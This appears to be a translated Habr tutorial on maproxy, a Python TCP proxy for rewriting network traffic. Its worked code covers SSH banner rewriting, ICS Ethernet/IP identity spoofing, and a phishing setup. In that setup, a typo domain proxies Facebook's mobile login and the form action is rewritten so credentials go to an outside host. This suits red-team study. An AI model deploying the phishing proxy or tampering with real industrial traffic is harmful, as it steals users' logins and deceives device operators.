A translation of this article was prepared on the eve of the start of the course
Introduction
Various kinds of security assessments, from penetration tests and Red Team operations to attacking IoT/ICS devices and SCADA, involve working with binary network protocols, that is, intercepting and modifying network data between the client and the target. Sniffing network traffic is not a hard task, since we have tools such as Wireshark, Tcpdump or Scapy, but modification looks like a more laborious job, because we need some kind of interface to read network data, filter it, change it on the fly and send it back to the target host in almost real time. On top of that, it would be nice if such a tool could simply handle many parallel connections and be customizable with scripts.
One day I came across a tool called maproxy, and its documentation quickly made it clear to me that maproxy is exactly what I need. It is a simple, usable and easily customizable TCP proxy. I tested this tool against several fairly demanding applications, including ICS devices (which generate lots of packets), to see whether it could handle many parallel connections, and the tool performed well.
This article introduces you to modifying network data on the fly using maproxy.
Description
The maproxy tool is built on Tornado, a well-known and mature asynchronous networking framework for Python.
In general, it can work in several modes:
- TCP:TCP - unencrypted TCP connections;
- TCP:SSL and SSL:TCP - one-way encryption;
- SSL:SSL - two-way encryption.
It comes as a library. To get started quickly, you can use the example files that demonstrate the main functionality:
- all.py
- certificate.pem
- logging_proxy.py
- privatekey.pem
- ssl2ssl.py
- ssl2tcp.py
- tcp2ssl.py
- tcp2tcp.py
Case 1 - a simple bidirectional proxy
Based on tcp2tcp.py:
```python
#!/usr/bin/env python
import tornado.ioloop
import maproxy.proxyserver

# forward every incoming connection to the local SSH server on port 22
server = maproxy.proxyserver.ProxyServer("localhost", 22)
# accept client connections on port 2222
server.listen(2222)
# hand control to Tornado's event loop
tornado.ioloop.IOLoop.instance().start()
```
By default ProxyServer() takes two arguments: the target host and the target port. server.listen() takes one argument: the port on which to listen for incoming connections.
Run the script:
```shell
# python tcp2tcp.py
```
To test it, we connect to the local SSH server through our proxy script, which listens on port 2222/tcp and connects to the standard SSH server port 22/tcp:
The greeting banner shows that our example script has successfully proxied the network traffic.
Case 2 - modifying data
Another demo script, logging_proxy.py, is ideal for interacting with network data. The comments in the file describe the class methods you can override to achieve your goal:
The most interesting ones here are:
- on_c2p_done_read - intercepts data on its way from the client to the server;
- on_p2s_done_read - the reverse direction.
Let's try to change the SSH banner that the server returns to the client:
```python
# […]
    def on_p2s_done_read(self, data):
        # rewrite the banner on its way from the server back to the client
        # (data is bytes under Python 3, so the patterns must be bytes too)
        data = data.replace(b"OpenSSH", b"DumnySSH")
        super(LoggingSession, self).on_p2s_done_read(data)
# […]
server = maproxy.proxyserver.ProxyServer("localhost", 22)
server.listen(2222)
# […]
```
Run the script:
As you can see, the client was misled, because the SSH server name presented to it was changed to «DumnySSH».
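To make the hook model of Case 1 and Case 2 runnable without installing maproxy or Tornado, here is an added example (not maproxy's code) that reimplements the same two hooks, on_c2p_done_read and on_p2s_done_read, on top of asyncio and runs the banner rewrite against a constructed local SSH-like server; the class and function names are my own.

```python
import asyncio

# Added example, not maproxy's code: a minimal asyncio TCP proxy exposing the two
# per-direction hooks that maproxy sessions use, so the rewrite can be tested offline.
class Session:
    def on_c2p_done_read(self, data: bytes) -> bytes:   # client -> server direction
        return data
    def on_p2s_done_read(self, data: bytes) -> bytes:   # server -> client direction
        return data

class BannerRewriteSession(Session):
    def on_p2s_done_read(self, data: bytes) -> bytes:
        return data.replace(b"OpenSSH", b"DumnySSH")     # bytes patterns under Python 3

async def _pump(reader, writer, hook):
    """Copy one direction, passing every chunk through the hook (like maproxy's on_*_done_read)."""
    try:
        while chunk := await reader.read(65536):
            writer.write(hook(chunk))
            await writer.drain()
    except ConnectionError:
        pass
    finally:
        writer.close()

async def _handle(client_r, client_w, target, session_factory):
    server_r, server_w = await asyncio.open_connection(*target)
    session = session_factory()
    await asyncio.gather(_pump(client_r, server_w, session.on_c2p_done_read),
                         _pump(server_r, client_w, session.on_p2s_done_read))

async def start_proxy(target, session_factory, listen_port=0):
    """Listen on 127.0.0.1:listen_port (0 = ephemeral) and forward to target=(host, port)."""
    return await asyncio.start_server(
        lambda r, w: _handle(r, w, target, session_factory), "127.0.0.1", listen_port)

async def _fake_ssh(reader, writer):
    writer.write(b"SSH-2.0-OpenSSH_8.9\r\n")            # constructed banner, sent on connect
    await writer.drain()
    await reader.read(64)                                # wait for the client's banner, then close
    writer.close()

async def _demo() -> bytes:
    ssh = await asyncio.start_server(_fake_ssh, "127.0.0.1", 0)
    proxy = await start_proxy(ssh.sockets[0].getsockname(), BannerRewriteSession)
    r, w = await asyncio.open_connection(*proxy.sockets[0].getsockname())
    banner = await r.readline()                          # what the client actually sees
    w.write(b"SSH-2.0-client\r\n"); await w.drain(); w.close()
    ssh.close(); proxy.close()
    return banner

def demo_banner_rewrite() -> bytes:
    """Run fake server, proxy and client in one event loop; returns the banner seen by the client."""
    return asyncio.run(_demo())
```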
Case 3 - a simple phishing web page
There are endless ways to use this tool. This time let's look at something practical from the Red Team side. Let's clone the m.facebook.com landing page and use a custom domain with a deliberate typo, for example m.facebok.com. For demonstration purposes, let's just assume that the domain is registered by us.
We will set up an unencrypted network connection between the victim and the proxy and an SSL stream to the Facebook server (31.13.81.36). To make this example work, we have to replace the HTTP Host header and inject the proper hostname, and we will also disable response compression so that we can easily access the content. Finally, we replace the HTML form so that the login credentials are sent to us instead of Facebook's servers:
```python
# […]
    def on_c2p_done_read(self, data):
        # replace Host header
        data = data.replace(b"Host: m.facebok.com", b"Host: m.facebook.com")
        # disable compression
        data = data.replace(b"gzip", b"identity;q=0")
        data = data.replace(b"deflate", b"")
        super(LoggingSession, self).on_c2p_done_read(data)
# […]
    def on_p2s_done_read(self, data):
        # partial replacement of response
        data = data.replace(b'action="/sn/login/"', b'action="https://redteam.pl/"')
        super(LoggingSession, self).on_p2s_done_read(data)
# […]
server = maproxy.proxyserver.ProxyServer("31.13.81.36", 443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
# […]
```
In brief:
As you can see, we successfully managed to substitute the original site.
Case 4 - Ethernet/IP porting
I have been working with industrial equipment and software (ICS/SCADA) for quite a while: programmable logic controllers (PLC), I/O modules, drives, relays, ladder programming environments and much more. This case is for those who love industrial stuff. Attacking such solutions involves actively playing with network protocols. In the following example I want to show how you can modify ICS/SCADA network traffic.
To do this, you will need the following:
- A network sniffer, for example Wireshark;
- An Ethernet/IP or simply a SIP device, which you can find using the Shodan service;
- Our script based on maproxy.
First, let's look at what a standard identification response from CIP (Common Industrial Protocol) looks like:
Device identification is performed over the Ethernet/IP protocol, an industrial adaptation of Ethernet that encapsulates control protocols such as CIP. We will change the highlighted ID name visible in the screenshot, "NI-IndComm for Ethernet", using our proxy script. We can again use the logging_proxy.py script and, in the same way, modify the on_p2s_done_read class method, because we want a different identification name to appear on the client side.
Code:
```python
# […]
    def on_p2s_done_read(self, data):
        # partial replacement of response
        # check whether this is a List Identity response (CIP Identity item type 0x000C at offset 26)
        if data[26:28] == b'\x0c\x00':
            print('Got response, replacing')
            # overwrite the first 10 bytes of the product name, which starts at offset 63
            data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
        super(LoggingSession, self).on_p2s_done_read(data)
# […]
server = maproxy.proxyserver.ProxyServer("1.3.3.7", 44818, session_factory=LoggingSessionFactory())
server.listen(44818)
# […]
```
In fact, we requested the device identification twice: the second response is the original one, and the first was modified on the fly.
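The two magic numbers in the script above (the item type at bytes 26:28 and the product name at offset 63) follow directly from the ENIP encapsulation header and the CIP Identity item layout. The following added example (my own code, not from the article or maproxy) builds a constructed List Identity reply with struct, parses it back field by field with length checks, and generalizes the article's fixed-width replacement by fixing up the item and encapsulation lengths when the new name has a different length; the vendor, device type and socket address values are sample data.

```python
import struct

# Added example, not from the article: ENIP encapsulation + CIP Identity item layout,
# showing where data[26:28] == b'\x0c\x00' and the product name offset 63 come from.
ENIP_LIST_IDENTITY = 0x0063       # encapsulation command "List Identity"
CIP_IDENTITY_ITEM = 0x000C        # item type ID of the CIP Identity item
ENCAP_HEADER = "<HHIIQI"          # command, length, session, status, sender context, options (24 bytes)
IDENTITY_FIELDS = "<HHHBBHI"      # vendor, device type, product code, rev major/minor, status, serial

def build_list_identity_reply(product_name: bytes, serial: int = 0x31337) -> bytes:
    """Construct a minimal List Identity reply (sample values; ENIP fields are little-endian)."""
    sock_addr = struct.pack(">HH4s8s", 2, 44818, bytes([10, 0, 0, 7]), b"\x00" * 8)  # big-endian
    item = struct.pack("<H", 1) + sock_addr                       # protocol version, socket address
    item += struct.pack(IDENTITY_FIELDS, 0x0001, 0x000C, 0x0010, 1, 2, 0x0030, serial)
    item += bytes([len(product_name)]) + product_name + b"\x03"   # name length, name, device state
    body = struct.pack("<HHH", 1, CIP_IDENTITY_ITEM, len(item)) + item  # item count, type, length
    return struct.pack(ENCAP_HEADER, ENIP_LIST_IDENTITY, len(body), 0, 0, 0, 0) + body

def parse_list_identity(data: bytes) -> dict:
    """Return the identity fields, or {} if this is not a well-formed List Identity reply."""
    if len(data) < 64:
        return {}
    cmd, length = struct.unpack_from("<HH", data, 0)
    count, item_type, item_len = struct.unpack_from("<HHH", data, 24)   # offsets 24, 26, 28
    if cmd != ENIP_LIST_IDENTITY or count < 1 or item_type != CIP_IDENTITY_ITEM:
        return {}
    if length + 24 != len(data):
        return {}                           # encapsulation length disagrees with the frame
    vendor, dev_type, product_code, major, minor, status, serial = struct.unpack_from(IDENTITY_FIELDS, data, 48)
    name_len = data[62]
    name = data[63:63 + name_len]           # the article's hard-coded offset 63
    if len(name) != name_len or item_len != 34 + name_len:
        return {}                           # truncated or length-inconsistent reply
    return {"vendor": vendor, "device_type": dev_type, "product_code": product_code,
            "revision": (major, minor), "status": status, "serial": serial,
            "product_name": name, "state": data[63 + name_len]}

def rewrite_product_name(data: bytes, new_name: bytes) -> bytes:
    """Replace the product name and fix up both length fields; unparsable input is returned unchanged.
    (The article's fixed-width replace only works while the new name fits inside the old one.)"""
    ident = parse_list_identity(data)
    if not ident:
        return data
    old_len = len(ident["product_name"])
    out = data[:62] + bytes([len(new_name)]) + new_name + data[63 + old_len:]
    item_len = struct.unpack_from("<H", out, 28)[0] + len(new_name) - old_len
    return (struct.pack("<HH", ENIP_LIST_IDENTITY, len(out) - 24) + out[4:28]
            + struct.pack("<H", item_len) + out[30:])
```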
And finally
In my opinion maproxy is a simple and handy tool, which is also written in Python, so I believe you too can benefit from using it. Of course, there are more sophisticated tools for processing and modifying network data, but they also require more attention and are usually built for one particular use case, for example. maproxy lets you quickly implement your own ideas for intercepting network data, since the example scripts are very clear.
Source: www.habr.com